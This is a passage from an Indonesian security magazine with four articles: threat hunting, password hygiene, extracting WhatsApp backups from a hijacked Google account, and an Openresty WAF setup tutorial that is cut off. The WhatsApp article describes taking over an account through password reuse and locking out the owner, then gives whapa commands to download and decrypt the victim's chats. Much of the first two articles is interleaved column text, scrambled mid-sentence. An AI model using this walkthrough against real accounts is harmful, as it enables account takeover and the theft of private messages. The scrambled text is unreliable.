peningkatan atau improvement. Pada level hasilan dari proses hunting yang nilainya
ini organisasi melibatkan machine learning cukup tinggi, hipotesa serta evidence yang
dan visualization untuk menemukan out- didapatkan dari hasil hunting di level terse-
liers “bad guys”yang mencoba melakukan but diotomasi kembali seperti halnya yang
kamuflase dan menghindari deteksi dari dilakukan pada level HM3 yang melakukan
threat hunter. Sebagai contoh, aktivitas automasi terhadap hal yang sifatnya prose-
yang sifatnya berulang dan ancaman yang dural dan hal yang bersifat umum.
sifatnya umum, akan dibuatkan semacam
proses otomasi yang bersumber dari prose- 2. The Hunting Loop
dur yang dikembangkan di HM2 sebe-
Seperti yang telah kita bahas bersama
lumnya. Aktivitas yang sifatnya rutin tadi
pada Threat Hunting Maturity Model di
akan diserahkan kepada mesin, sehingga
bagian sebelumnya, sukses dan gagalnya
security analyst lebih fokus kepada hal lain
program threat hunting ini akan bergan-
di luar hal-hal yang umum yang telah di-
tung pada organisasi anda berada di level
proses secara otomatis tersebut. Dengan
apa? Semakin matang suatu organisasi,
demikian proses threat hunting akan lebih
maka tingkat keberhasilan proses threat
efektif. Namun seiring dengan waktu tentu
hunting ini akan semakin tinggi. Lalu
saja dengan semakin banyaknya data set
seperti apakah proses threat hunting se-
dan hipotesa-hipotesa baru yang muncul
cara best practice itu? Pada poin ini akan
sehingga akan mengakibatkan banyaknya
dibahas mengenai Threat Hunting Loop
proses serta kompleksitas yang akan diha-
atau Threat Hunting Cycle. Threat Hunting
dapai oleh security analyst tersebut.
loop ini akan mencoba memberikan kita
HM4 (Hunting Maturity 4) – Leading gambaran seperti apa proses threat hunt-
ing yang dilakukan secara berulang.
Pada HM4 ini kurang lebih prosesnya tidak
jauh berbeda dengan level kematangan di
level HM3. Namun hal yang mencolok
yang membedakan adalah, dimana pada
HM4 ini, aktivitas hunting yang sukses
akan diotomasi kembali sehingga akan se-
makin spesifik tugas yang dilakukan oleh

ing umum adalah celah melalui social engi-
neering (seperti phishing, vishing (voice
call), fake application). Lalu setiap sub-
hipotesa dibuat lebih mendalam lagi serta
dimasukan kemungkinan apa saja yang da-
pat terjadi mulai dari hipotesa utama sam-
pai ke sub-hipotesa, dan bagian terdalam
lainnya. Dengan menyusun kerangka sema-
cam ini, maka kita dapat memprediksi dari
mana saja kemungkinan celah ancaman
akan muncul sehingga kita dapat melaku-
kan persiapan ataupun melakukan aktivi-
Gambar 2 : Threat Hunting Loop tas hunting jika salah satu poin dari hipo-
tesa anda terpicu. Tentunya hipotesa yang
Pembuatan Hipotesa (Create Hipotesis) telah disusun tadi perlu diuji baik dari as-
pek validitasnya maupun tingkat kemungki-
Pada Threat Hunting Loop salah satu nan terjadinya. Melalui penyusunan ker-
bagian yang penting adalah bagaimana se- angka hipotesa untuk mendeteksi perilaku
orang security analyst menyusun kerangka anomali (anomaly behaviour) yang mungkin
berpikir secara cepat berdasarkan pengeta- terjadi ini, threat hunter akan lebih aware
huan, keterampilan dan pengalaman yang dan juga punya baseline untuk melakukan
dimilikinya untuk menyusun sebuah hipo- sebuah proses hunting. Contoh yang
tesa yang akan menjadi sebuah baseline biasanya juga dilakukan adalah dengan
dalam melakukan aktivitas threat hunting. melakukan kombinasi pemetaan antara kill
Sebagai contoh adalah seperti pada kasus chain phase attacker (lihat Artikel Threat
berikut ini : dalam sebuah organisasi yang Hunting 101 Part 1 pada Edisi sebe-
paling menjadi saasaran “bad guys” ada- lumnya) dengan risk assessment untuk
lah orang nomor satu dalam perusahaan, aset yang dimiliki sebagai tahapan awal
yaitu CEO. Lalu security analyst membuat pembuatan hipotesa untuk melakukan
hipotesa, kira-kira kemungkinan apa saja proses threat hunting.
yang dapat terjadi, serta ancaman yang
akan muncul pada end user seperti CEO
suatu organisasi. Misalnya kasus yang pal-

Investigate via Tools and Technique https://cambridge-intelligence.com/use-ca
ses-graph-visualization-cyber-security/
Tools dan teknik ini erat kaitannya dalam
proses investigasi. Setelah proses pembua- Jika anda ingin lebih dalam untuk mema-
tan hipotesa, maka perlu adanya proses in- hami Security dan Visualization, penulis
vestigasi untuk mencari evidence terkait mencoba menyarankan untuk membaca
dengan intrusi yang ada pada organisasi referensi buku berikut ini :
kita. Tools tidak akan dapat bekerja
๏ Data Driven Security
dengan baik jika anda tidak mempunyai
data set yang lengkap. Tools dan teknik da- ๏ Applied Security Visualization
pat bekerja dengan baik jika anda juga ๏ Security Data Visualization
memiliki data set yang lengkap untuk
 
proses investigasi. Analisis keterhubungan
Uncover New Pattern and TTP
data dan visualiasi juga diperlukan untuk
menemukan outliers yang berada pada in- Setelah kita melalui tahapan kedua yaitu
frastruktur anda. Dengan data set yang investigasi threat actor melalui tools dan
jumlahnya cukup besar dan kompleks, technique, maka di siklus selanjutnya ada-
perlu ada suatu platform untuk memvisu- lah threat hunter mencoba mencari pola
alisasikan data tersebut saat melakukan lainnya yang mungkin dilakukan penyer-
proses hunting. Penulis secara pribadi ang. Sebagai contoh sederhana adalah,
menganjurkan anda untuk coba melihat maling akan mencari berbagai macam
website http://www.secviz.org/ sebagai ru- cara baru untuk melakukan pembobolan
jukan. Raffael Marty adalah salah satu terhadap mobil. Ada berbagai macam tek-
pakar yang fokus mendalami riset menge- nik baru yang mungkin dilakukan untuk
nai keamanan and visualisasi. Anda dapat mencuri sebuah mobil. Tugas polisi adalah
menggunakan platform sistem operasi mencari tahu celah mana yang mungkin da-
yang di bangun oleh Marty untuk memban- pat digunakan si maling untuk melakukan
gun sebuah platform visualisasi untuk me- aksi pencurian. Tactic, Technique, dan Pro-
nemukan para “bad guys”. Anda juga da- cedure (TTP) akan di ulas lebih mendalam
pat meilhat rujukan website berikut ini un- pada seri artikel berikutnya.
tuk menemukan lebih jelas informasi men-
genai security visualization :

Gambar 3 : The Hunting Matrix
Inform and Enrich Analytics threat hunter dapat lebih fokus kepada
pola serangan baru lainnya, dan proses
Sebagaimana kita telah ulas bersama di berulang yang berupa hal-hal yang bersifat
bagian Threat Hunting Maturity Model, umum cukup dieksekusi oleh platform
otomasi adalah salah satu bagian yang ha- otomasi tadi.
rus dilakukan dalam tingkat kematangan di
tingkatab atas dalam sebuah proses threat 3. The Hunting Matrix
hunting. Ketika threat hunter sudah berha-
sil menentukan teknik yang digunakan oleh Setelah kita melihat Hunting Maturity
pada “bad guys”, maka fakta tersebut Model (HMM) dan Threat Hunting Loop,
akan dijadikan proses otomasi untuk men- maka pada tahapan ini kita dapat mem-
gulang proses tersebut untuk mencari buat sebuah matriks yang menghubung-
”bad guys” lainnya. Hal ini dilakukan agar kan kedua hal tersebut.

Kombinasi HMM dan The Hunting Loops Referensi
akan membuat sebuah matrix process
threat hunting yang dapat dijadikan acuan 1. F r a m e w o r k f o r T h r e a t H u n t i n g .
oleh sebuah organisasi yang mencoba me- https://sqrrl.com/media/Framework-for-
lakukan pendekatan terhadap threat hunt- Threat-Hunting-Whitepaper.pdf
i n g . Te n t u s a j a s e t i a p o rg a n i s a s i
2. H u n t i n g i n T h e D a r k :
mempunyai HMM yang berbeda-beda. Un-
https://www.slideshare.net/RyanKazanci
tuk itu dalam masing-masing tingkatan
yan/hunting-in-the-dark-htcia-2015-523
level HMM dalam sebuah organisasi,
89487
mereka dapat menyesuaikan ke dalam ta-
hapan threat hunting loops sesuai dengan 3. Scalable Methods for Conducting Cyber
kapabilitas dan tingkat kematangan yang Threat Hunt Operations :
sesuai dengan organisasi mereka. https://www.sans.org/reading-room/whit
epapers/threats/scalable-methods-cond
Pada artikel di seri pertama, kita fokus
ucting-cyber-threat-hunt-operations-370
membahas mengenai pengenalan Threat
90
Hunting, serta komponen People yang terli-
bat dalam Threat Hunting. Pada artikel 4. The Role of Visualization in Cyber Intelli-
bagian kedua ini kita membahas mengenai gence.
Process dalam aktivitas Threat Hunting, https://www.recordedfuture.com/cyber-i
Pada edisi mendatang di artikel seri ketiga, ntelligence-visualization/
akan dibahas lebih mendalam mengenai
TTP (Tactic, Technique, Procedure) yang 5. Use cases for graph visualization: Cyber
digunakan oleh penyerang dalam men- S e c u r i t y.
jalankan misinya. Selain itu di artikel https://cambridge-intelligence.com/use-
bagian ketiga nanti juga akan membahas cases-graph-visualization-cyber-securit
mengenai platform teknologi yang digu- y/
nakan dalam proses Threat Hunting.
6. Data Visualization: Keeping an Eye on
To Be Continue… S e c u r i t y.
https://www.darkreading.com/threat-int
elligence/data-visualization-keeping-an-
eye-on-security/a/d-id/1328493

DIGIT OKTAVIANTO
GCIH, GICSP, CEH, ECSA,
ECIH, CHFI, CAST 612. CEI,
IBM Qradar Security Associate
Digit Oktavianto, atau yang sering disapa

Digit, adalah seorang pegiat cybersecurity,
independent security researcher dan secu-
rity architect di perusahaan PT. Mitra Inte-
grasi Informatika. Beberapa pengalaman
dan topik yang merupakan passion dari
Digit Oktavianto antara lain :
Cyber Security Operation Center, Threat

Hunting, DFIR (Digital Forensic and Inci-
dent Response), Malware Analysis, Cyber
Defense Operation, Threat Intelligence, OS-
INT, Incident Handling and Incident Re-
sponse, Active Defense and Continuous
Monitoring, ICS/Scada Security.
27
Lindungi Password Anda Untuk
Melindungi Data Anda
ditulis oleh Erwin Jonathan
sumber : https://www.irishtimes.com/polopoly_fs/1.2998520.1488783356!/image/image.jpg_gen/derivatives/box_620_330/image.jpg
Suatu hari saya berada didalam sebuah bank semenjak mereka pertama kali mem-
diskusi dengan sekumpulan teman-teman, buka akun tersebut. Tidak berbeda jauh
karena rasa keingintahuan maka saya me- dengan jawaban pertanyaan sebelumnya,
nanyakan kepada mereka perihal seberapa kurang dari 3 orang yang mengangkat
sering mereka mengganti PIN akun bank tangan. Mengejutkan, tetapi itulah
yang mereka miliki. Saya menanyakan kenyataan!
berdasarkan periode waktu dimulai dari
periode 1 bulan, kemudian 3 bulan, hingga Beban Untuk Semua
periode 1 tahun. Hanya 3 orang yang men-
Berapa banyak dari anda yang pernah
jawab dengan mengangkat tangan. Kemu-
mengalami situasi dimana anda menga-
dian, saya melanjutkan pertanyaan perihal
lami kesulitan dalam mengingat password
apakah mereka sudah mengganti PIN akun

sehingga akhirnya menggunakan fitur kan pengalihan risiko kepada pengguna
“forgot password” / “lupa password”? Di layanan dan membuat program untuk
dalam era digital ini, beberapa orang meningkatkan kesadaran pengguna untuk
sangat memungkinkan memiliki akun lebih mengganti password secara rutin.
dari satu. Akun untuk email, akun untuk
akun di website ecommerce, akun untuk Langkah Selanjutnya?
media sosial, dll. Ditambah dengan pass-
Mengingat akan adanya risiko yang senan-
word untuk akun di komputer, gadget,
tiasa mengintai pengguna layanan, perlu
akun bank dan banyak lainnya. Kita diha-
adanya kesadaran akan pentingnya menga-
ruskan mengingat seluruh password terse-
mankan data. Beberapa opsi yang dapat
but!
digunakan untuk mengamankan password
Oleh karena itu, untuk sebagian orang adalah:
mempunyai banyak akun di internet men-
ciptakan beban tersendiri yaitu harus Opsi pertama: Gunakan Password
mengingat seluruh password dari masing- Yang Kuat.
masing akun. Sehingga, menjadi sebuah
Untuk menciptakan password yang kuat
kebiasaan untuk mempermudah, mereka
tidak sesulit yang dibayangkan. Salah satu
menggunakan password yang identik un-
tips yang umum adalah dengan memilih
tuk seluruh akun internet yang mereka
password anda menggunakan kalimat
miliki. Akibatnya, akan menciptakan se-
yang panjangnya minimal 12 karakter dari
buah “celah keamanan”.
lagu kesukaan, buku, kata-kata mutiara,
Hal ini pun secara tidak langsung didu- dan lainnya. Ini akan membantu anda un-
kung oleh penyedia layanan dengan tidak tuk mengingat password anda bila
mewajibkan pengguna mereka untuk dibandingkan menggunakan rangkaian
mengganti password akun secara rutin. huruf acak yang dihasilkan dari piranti
Jika penyedia layanan mewajibkan hal ter- lunak pembuat password, atau yang lebih
sebut, maka akan berdampak terhadap buruk menggunakan data pribadi sebagai
ketidaknyamanan terhadap pengguna password. Anda dapat menambahkan be-
layanan dan meningkatkan keluhan ke- berapa kombinasi untuk meningkatkan
pada bagian customer service. Sebagai kekuatan password anda, seperti huruf
langkah mitigasi, penyedia layanan melaku-

kapital, huruf kecil, angka dan karakter masukan karakter tambahan setelah pass-
khusus. word yang valid dimasukkan. Contoh lain-
nya, Facebook juga menyediakan layanan
Opsi kedua: Jangan Pernah Menulis- serupa. Untuk informasi lebih lanjut, silah-
kan Password Anda. kan kunjungi link berikut
(web[.]facebook[.]com/help/148233965247
Password anda tidak akan pernah dika-
823?_rdc=1&_rdr).
takan sebagai password bila anda menulis-
kannya tanpa memberikan perlindungan Opsi keempat: Piranti Lunak Manaje-
dari pihak yang tidak berkepentingan. Se- men Password.
bagai contoh, anda menuliskan password
anda di sticky notes, kemudian menempel- Seperti yang sudah dibahas sebelumnya,
kannya dilayar monitor anda. Atau menulis- semakin banyak akun yang dimiliki maka
kannya di aplikasi notepad. Ketika kom- akan menciptakan beban tambahan peng-
puter yang anda gunakan dapat diakses guna layanan untuk mengingat password
baik secara fisik maupun virtual melalui dimasing-masing akun. Dan akhirnya
jaringan komputer, maka dapat menjadi menggunakan password yang identik un-
sasaran bagi penjahat siber. tuk seluruh akun dipandang hal yang realis-
tis dan terbaik. Hal itu nyata, tetapi tidak
Opsi ketiga: Otentikasi 2 Faktor. direkomendasikan untuk alasan kea-
manan. Oleh karena itu, piranti lunak mana-
Beberapa penyedia layanan menyediakan
jemen password dapat digunakan untuk
fitur otentikasi 2 faktor sebagai membantu
mengatasi hal tersebut. LastPass, Kasper-
pengguna layanan untuk mengamankan
sky Password Manager / KeePass ada-
akun mereka. Hal ini maksudnya adalah
lah segelintir piranti lunak manajemen pass-
pengguna akan diminta oleh penyedia
word yang akan membantu anda untuk
layanan untuk memasukan beberapa karak-
mengingat dan menyimpan secara aman
ter tambahan yang bertujuan untuk mem-
seluruh password-password akun anda
validasi bahwa pengguna yang bersangku-
dengan cara yang aman. Dan tentunya,
tan adalah yang memiliki akun tersebut. Se-
akan mengurangi sakit kepala anda!
bagai contoh, penyedia layanan raksasa
Google menyediakan Google Authentica-
tor. Ini akan memaksa pengguna untuk me-

Opsi kelima: Ubah Password Secara
Berkala.
Langkah ini wajib dilakukan sebagai lang-

kah utama jika anda ingin mengamankan
data anda. Beberapa penyedia layanan
menyediakan informasi mengenai kapan
terakhir kali anda mengganti password
anda. Hal itu akan mengingatkan anda un-
tuk mengganti password secara berkala se-
cepatnya!
Selalu ada cara untuk mengamankan data

anda dari penjahat siber. Lebih baik untuk
sadar secepatnya dan mulai untuk
mengaplikasikan opsi satu dan selanjutnya
daripada kehilangan data anda yang tidak
ternilai harganya!
Lakukan sekarang…
ERWIN JONATHAN
CISA

Kelalaian Mengganti Password E-mail Google
Account Berujung pada Terbongkarnya Data
Backup Whatsapp
ditulis oleh Riyan Surya Pratama
Perlu kita ketahui bahwa Whatsapp merupakan layanan mengirim pesan yang sangat
populer di dunia, termasuk di indonesia. Indonesia sendiri merupakan salah satu peng-
guna yang paling sering menggunakan Whatsapp untuk saling berkomunikasi dengan
nyaman dan aman. Namun dengan seiring berjalannya waktu, banyak sekali penelitian
terkait celah keamanan yang terdapat di aplikasi Whatsapp yang bisa dimanfaatkan untuk
membongkar data yang ada di dalam Whatsapp. Terkait dengan privasi pengguna yang
menggunakan layanan tersebut, biasanya untuk seseorang dapat membuka data
Whatsapp diperlukan otentikasi berupa OTP (One time password) yang biasanya dikirim-
kan melalui pesan singkat. Tujuan digunakannya OTP untuk memverifikasi keaslian dari se-
buah nomor untuk digunakan sebagai akun Whatsapp.

Data Whatsapp sendiri pada smartphone yang berbasis android, pada umumnya sudah
automatis terbackup pada Google Drive, namun apakah data yang tersimpan pada
Google Drive itu aman ? belum tentu jika anda tidak rajin melakukan audit terhadap pass-
word utama anda. Pada tahap ini anggap saja data anda yang digunakan untuk mendaftar
sebuah akun di website A sebagai contoh, detil password yang anda gunakan sama
dengan password email, lalu kemudian hacker yang tengah menargetkan Website A untuk
di dump datanya, karena situs tersebut memiliki potensi user yang cukup melimpah. Lalu
ketika si hacker telah mendapatkan data daftar password dan email hasil dump dari web-
site A, secara tidak sengaja password yang digunakan untuk mendaftar di website A sama
dengan yang digunakan untuk mendaftar di Google Account, tentu hal ini akan sangat
mudah bagi si hacker untuk mendapatkan akses kedalam akun tersebut, hal yang paling
mungkin untuk dilakukan si hacker adalah mengganti recover email dan password. Hal ini
bertujuan agar user pemilik email tersebut tidak bisa lagi mengakses emailnya kembali
atau melakukan recovery.
Dengan data yang dianggap cukup, si hacker lalu akan mencoba melihat isi dari email, his-
tory browsing dan lain sebagainya , tidak menutup kemungkinan hacker akan mengakses
google drive akun yang telah diambil alih tersebut. Lalu hacker akan melihat folder yang
berisi data backup dan data lainya yang telah otomatis tersinkronisasi dengan telepon
genggam si pemilik akun email tersebut (lihat Gambar 1).
Gambar 1 - Data Backup Whatsapp yang tersimpan di dalam Google Drive

Setelah hacker mengkonfirmasi adanya data cadangan atau backup Whatsapp, lalu
hacker mencoba mengunduh data tersebut, namun data tersebut tidak dapat bisa didown-
load begitu saja, sehingga diperlukan tools tambahan untuk mengunduh data ini. Salah
satu tools yang dapat digunakan untuk mengunduh data tersebut dan berfungsi untuk
memparsing data tersebut dengan mudah, yaitu whapa, dan tools ini tersedia di Github
dengan alamat berikut
https://github.com/B16f00t/whapa
Salah satu fungsi utama dari Whapa adalah menyajikan data yang disimpan di dalam data-
base Sqlite dengan cara yang bisa dipahami oleh analis. Tools ini ditulis dengan menggu-
nakan bahasa pemrograman Python 2.x. Secara umum perangkat lunak ini dibagi menjadi
tiga mode, yaitu :
๏ Mode Pesan. Mode ini digunakan untuk menganalisis semua pesan yang tersimpan di
dalam database, melakukan filter serta mengekstrak gambar pratinjau (thumb nail pic-
tures) yang tersedia tersedia.
๏ Decryption Mode. Mode ini digunakan untuk mendekripsi database kripto12 selama
kunci enkripsinya tersedia atau diketahui.
๏ Info Mode. Mode ini digunakan untuk menampilkan informasi yang berbeda tentang
status dan grup whatsapp.
Proses Instalasi Whapa

# 1 - whapa.py (Whatsapp Parser)
Anda dapat mengunduh versi terbaru dari whapa dengan mengkloning repositori GitHub
dengan menjalankan perintah berikut
git clone https://github.com/B16f00t/whapa.git

kemudian setelah itu jalankan perintah berikut
pip install -r requirements.txt
# 2 - whagdext.py (Melakukan Ekstraksi data dari Akun Google Drive)
sebelum melakukan proses ekstraksi data dari akun google drive, maka pastikan lakukan
instalasi dependensi berikut
sudo apt-get update sudo apt-get install -y python3-pip

sudo pip3 install pyportify
untuk menggunakan tools ini, jangan lupa untuk melakukan konfigurasi terhadap file
settings.cfg, dengan memasukan akun email dan password yang valid untuk akun terse-
but.
[auth]
gmail = alias@gmail.com
passw = yourpassword
kemudian jalankan perintah berikut pada terminal
python3 whagdext.py "arguments"

Gambar 2 - Daftar Informasi Perintah yang didukung menggunakan Whapa
Beberapa Contoh Penggunaan Perintah Whapa

๏ Mode Pesan.
python whapa.py -m

๏ Menampilkan semua pesan dari database dengan rentang waktu tertentu
python whapa.py -m -tS "12-12-2017 12:00" -tE "13-12-2017 12:00"
๏ Tampilkan semua pesan dari database
python whapa.py -m -w -tI
๏ Mode Dekripsi. Dekripsi pesan yang tersimpan di dalam file msgstore.db.crypt12
python whapa.py msgstore.db.crypt12 -k key
๏ Mode Info
python whapa.py -i
Kesimpulan
Data data yang kita anggap selama ini aman karena telah tersimpan di Google Drive men-
jadi tidak ada artinya, apalagi jika di dalam data backup tersebut ada data–data yang bersi-
fat sangat sensitif, maka tidak menutup kemungkinan untuk dijadikan bahan pemerasan
atau black mail. Semoga informasi yang sangat sederhana dari seorang script kiddies
yang ingin menjadi seorang yang handal di bidang cyber defense dapat meningkatkan ke-
waspadaan atau security awareness.
Catatan
Terkait dengan PoC (Proof of Concept), penulis tidak menyertakan dikarenakan pemilik
akun yang telah bersedia untuk dilakukan uji coba tidak ingin dilakukan publikasi terkait
hasil dari apa yang telah ditampilkan pada penggunaan tools untuk menampilkan data
yang telah berhasil didapatkan dan terkait screenshoot yang terdapat nomor handphone
adalah nomor penulis. Namun penulis dapat melakukan POC terkait artikel yang telah di-
tulis jika ada yang berminat untuk ditampilkan data whatsappnya sebagai acuan untuk
pembelajaran semata.

Riyan Surya Pratama
Associate Security Engineer
PT. Korelasi Persada
Riyan Surya Pratama memiliki passion di

bidang Offensive Security and Ethnical
Hacking. Beberapa pengalaman yang per-
nah dijalaninya yaitu
1. Speaker for PHP Indonesia chapter
Jogja and Solo bring topic’s “how to
build mini web server with Raspberry
pi 2”
2. Leading an organizational unit on Uni-
versitas Teknologi Yogyakarta campus
in the field of Linux And Open Source
since "2013 - 2016"
3. Internship — Eijkman Institute
4. Fulltime – PT . Asietex sinar indopra-
tama
5. Internship – Intertek Laboratories Ltd.
38
“Companies spend millions
of dollars on firewalls,
2 encryption and secure

access devices, and it’s
money wasted; none of
these measures address the
TUTORIAL weakest link in the security
chain”
– Kevin Mitnick
Create your own WAF with Openresty
and lua-resty-waf
ditulis oleh Rendra Perdana
Web Application Firewall (WAF) adalah komponen penting dalam struktur pertahanan
berlapis (defense-in-depth). Tuntutan bisnis dimana software perlu dikembangkan dengan
cepat, maka security seringkali menjadi bukan prioritas utama. Sehingga hal ini menyebab-
kan software yang vulnerable atau kondisi lingkungan uji (test environment) yang tidak
seragam dengan production.
Kali ini penulis akan membahas Openresty (http://openresty.org/en/) yang ditambahkan

fitur WAF melalui module lua-resty-waf (https://github.com/p0pr0ck5/lua-resty-waf).
Openresty merupakan platform berbasis web yang mengintegrasikan core Nginx, LuaJIT,
Lua Libraries dan berbagai macam Nginx modules.

Mari kita uji Openresty dan lua-resty-waf dengan wordpress via LEMP (Linux, Nginx,
MySQL, PHP) stack sebagai contoh aplikasi web yang akan dilindungi. Tahapan yang
akan kita lakukan adalah:
1. Instalasi Openresty
2. Instalasi Wordpress stack
3. Instalasi lua-resty-waf
4. Integrasi
5. Konfigurasi Rules dan Contoh Serangan
Proses build diatas dilakukan pada direktori /opt dan Openresty dipasang pada direktori
/usr/local/openresty. Berikut adalah diagram proses dari stack yang akan kita uji.
Gambar 1. Alur Proses Tahapan Pengujian

#1 - Instalasi Openresty
Openresty bisa didapatkan dalam bentuk source code dan binary release. Kita akan me-
makai source code karena penulis akan mencontohkan cara melakukan build openresty
dengan openssl library bawaan agar binary Openresty ini nantinya akan memakai versi
OpenSSL terbaru.
Source code Openresty bisa didapatkan di http://openresty.org/en/download.html. Se-

mentara source code OpenSSL bisa didapatkan di https://www.openssl.org/source/. Pada
tutorial ini penulis sudah menyiapkan repositori yang sudah diberikan kedua source code
diatas dan script instalasi untuk mempercepat proses. Clone repositori dengan perintah
berikut:
git clone https://github.com/rendraperdana/openresty-bundled
Pada repositori di atas terdapat file install.sh yang menunjukkan script lengkap untuk
proses instalasi Openresty yang akan kita pakai. Jalankan script install.sh yang akan me-
masang Openresty pada path /usr/local/openresty
Tahapan yang dilakukan script adalah:
Instalasi dependencies
yum groupinstall 'Development Tools' -y

yum install lua-devel readline-devel pcre-devel gcc perl-Digest-* zlib-devel -y
Lalu jalankan ./configure untuk membuat konfigurasi build Openresty dan OpenSSL.
./configure \
--with-cc-opt='-O3 -Ofast -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2 -fexcep-
tions -fstack-protector-strong --param=ssp-buffer-size=4 -grecord-gcc-
switches -m64 -mtune=native -DTCP_FASTOPEN=23' \
--with-pcre-jit \
…(string omitted)

Berikut contoh file unit systemd untuk Openresty:
[Unit]
Description=NGINX with LUA
After=syslog.target network.target remote-fs.target nss-lookup.target
[Service]
Type=forking
PIDFile=/var/run/openresty.pid
ExecStartPre=/usr/local/openresty/nginx/sbin/nginx -t
ExecStart=/usr/local/openresty/nginx/sbin/nginx -c
/usr/local/openresty/nginx/conf/nginx.conf
ExecReload=/bin/kill -s HUP $MAINPID
ExecStop=/bin/kill -s QUIT $MAINPID
PrivateTmp=true
[Install]
WantedBy=multi-user.target
Simpan file tersebut pada lokasi systemd, dan lakukan daemon-reload. Berikut adalah
contoh prosedur yang dilakukan pada install.sh untuk instalasi unit file:
rm -f /usr/lib/systemd/system/openresty.service
cp ./util/openresty.service /usr/lib/systemd/system/ -v
rm -f /usr/local/bin/openresty
ln -s /usr/local/openresty/bin/openresty /usr/local/bin/openresty
systemctl daemon-reload
systemctl enable openresty
Jika eksekusi install.sh telah berhasil maka command systemctl status openresty
jika dijalankan akan memberikan hasil sebagai berikut
● openresty.service - NGINX with LUA

Loaded: loaded (/usr/lib/systemd/system/openresty.service; enabled; vendor
preset: disabled) Active: failed (Result: exit-code)
Jalankan Openresty dengan perintah systemctl start openresty. Perintah /usr/

local/openresty/bin/openresty -V akan memberikan hasil sebagai berikut

nginx version: openresty/1.11.2.5
built by gcc 4.8.5 20150623 (Red Hat 4.8.5-16) (GCC)
built with OpenSSL 1.0.2n-fips 7 Dec 2017
TLS SNI support enabled
Kunjungilah IP address mesin ini melalui browser untuk membuka welcome page Openre-
sty.
#2 - Instalasi Wordpress Stack
Penulis memakai domain spoof test.com yang diset di file hosts lokal dan mengarah ke-
pada lokal Virtual Machine. Instalasi wordpress dan stack-nya tidak penulis bahas pada ar-
tikel ini.
Wordpress bisa dengan mudah didapatkan pada link https://wordpress.org/latest.tar.gz de-

kompresi paket tersebut dan taruhlah di hierarki folder yang bisa dipanggil oleh nginx dan
php-fpm. Penulis memakai path
/usr/local/openresty/nginx/conf/sites/test.com/ sebagai root directory.
Penulis sudah menyiapkan repositori contoh implementasi stack ini pada github :
https://github.com/rendraperdana/openresty-wordpress
#3 - Instalasi lua-resty-waf
Lua-resty-waf adalah lua module untuk Openresty yang dimiliki oleh Robert Paprocky
pada repositori https://github.com/p0pr0ck5/lua-resty-waf. Modul ini dipasang setelah
Openresty berhasil dipasang pada sistem. Kita akan membahas proses instalasi depen-
densi untuk modul ini kedalam Openresty secara bertahap.
Instalasi Resty binary
1. Salin binari resty: cp /usr/local/openresty/bin/resty /usr/local/bin
2. ln -s /usr/local/openresty/bin/resty /usr/local/bin/
3. [root@openresty lua-resty-waf]# ln -s /usr/local/openresty/bin/

opm /usr/local/bin/

Instalasi Lua-5.1.5
1. Buka folder openresty-bundle pada path openresty-bundle/bundle/lua-5.1.5
2. Build dengan: make linux -j
3. Install dengan: make install
Instalasi luarocks-2.4.2
1. Buka folder openresty-bundle pada path

openresty-bundle/bundle/luarocks-2.4.2
2. Build dengan: ./configure && make build
Instalasi LuaJIT
1. Buka folder openresty-bundle pada path

openresty-bundle/bundle/LuaJIT-2.1-20170808/
2. Build dengan: make -j
Instalasi lua-resty-waf
1. Buka folder openresty-bundle pada path openresty-bundle/bundle/lua-

resty-waf
2. Build dengan: make -j
4. Proses instalasi akan melakukan instalasi beberapa lua modul tambahan dan basic
rule untuk WAF
Jika proses instalasi telah selesai maka cek pada direktori /usr/local/openresty/
site/lualib/resty disana akan ada direktori waf dan waf.lua

Rules untuk WAF disimpan dalam bentuk file json pada direktori: /usr/local/
openresty/site/lualib/rules
Lua-resty-waf ini memilki rules contoh bawaan namun tidak memiliki file konfigurasi de-
fault bawaan. Pembuatan file konfigurasi dan contoh integrasinya akan penulis bahas
pada bagian berikutnya.
# 4 - Integrasi
Lua-resty-waf diinisialisasi dengan menggunakan perintah:
init_by_lua_block {
require "resty.core"
local lua_resty_waf = require "resty.waf"
lua_resty_waf.init()
}
Perintah diatas disimpan pada file wafinit.conf dan dipanggil pada block http{} di
NGINX dengan perintah include. Berikut contoh file nginx.conf penulis:
user nobody;
worker_processes auto;
error_log /var/log/nginx/error.log debug;

pid /var/run/openresty.pid;
events {
worker_connections 4096;
use epoll;
multi_accept on;
}
http {
include mime.types;
default_type application/octet-stream;
log_format main '$remote_addr - $remote_user [$time_local] "$request" '

'$status $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for"';
access_log /var/log/nginx/access.log main;
sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 15;

! gzip on;
gzip_comp_level 1;
gzip_min_length 1024;
gzip_vary on;
gzip_http_version 1.1;
include wafinit.conf;
include sites/test.com.conf;
}
Lalu untuk fungsi WAF dipanggil pada pada server{} atau location{} bisa dilakukan
dengan perintah sebagai berikut
access_by_lua_block {
local waf = lua_resty_waf:new()
waf:set_option("debug", true)
waf:set_option("mode", "ACTIVE")
waf:set_option("score_threshold", 8)
waf:set_option("allowed_content_types", "text/html", "text/json",

"application/json")
waf:set_option("process_multipart_body", false)
waf:set_option("res_body_max_size", 1024 * 1024 * 10)
waf:set_option("event_log_target", "file")
waf:set_option("event_log_target_path", "/var/log/nginx/waf.log")
waf:set_option("event_log_level", ngx.WARN)
waf:set_option("event_log_request_arguments", true)
waf:set_option("event_log_request_headers", true)
waf:set_option("event_log_request_body", true)
waf:set_option("event_log_periodic_flush", 5)
waf:exec()
}
header_filter_by_lua_block {
waf:exec()
}
body_filter_by_lua_block {
waf:exec()
}

log_by_lua_block {
waf:exec()
}
Perintah diatas disimpan dalam file wafstart.conf dan akan dipanggil dengan include
pada server ataupun lokasi yang ingin dilidungi.
Berikut contoh struktur direktori penulis pada path /usr/local/openresty/nginx/

conf
fastcgi.conf
fastcgi_params
mime.types
nginx.conf
sites/
! |-------test.com/
! |-------test.com.conf
wafinit.conf
wafstart.conf
Berikut contoh file test.com.conf penulis:
server {
listen 80;
server_name test.com;
charset utf-8;
access_log /var/log/nginx/access.log main;

error_log /var/log/nginx/error.log notice;
root conf/sites/test.com/;
index index.php index.html index.htm;
error_page 404 /404.html;

error_page 500 502 503 504 /50x.html;
location = /50x.html {
root html;
}

! location = /favicon.ico {
log_not_found off;
access_log off;
}
location ~ /\. {
access_log off;
log_not_found off;
deny all;
}
location / {
include wafstart.conf;
try_files $uri $uri/ /index.php?q=$uri&$args;
}
location ~ \.php$ {
fastcgi_pass unix:/var/run/php7.sock;
fastcgi_index index.php;
